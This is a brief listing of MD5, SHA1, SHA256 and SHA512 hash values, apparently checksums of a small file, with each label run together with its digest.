MD5b026324c6904b2a9cb4b88d6d61c81d1
SHA1e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e
SHA2564355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865
SHA5123abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686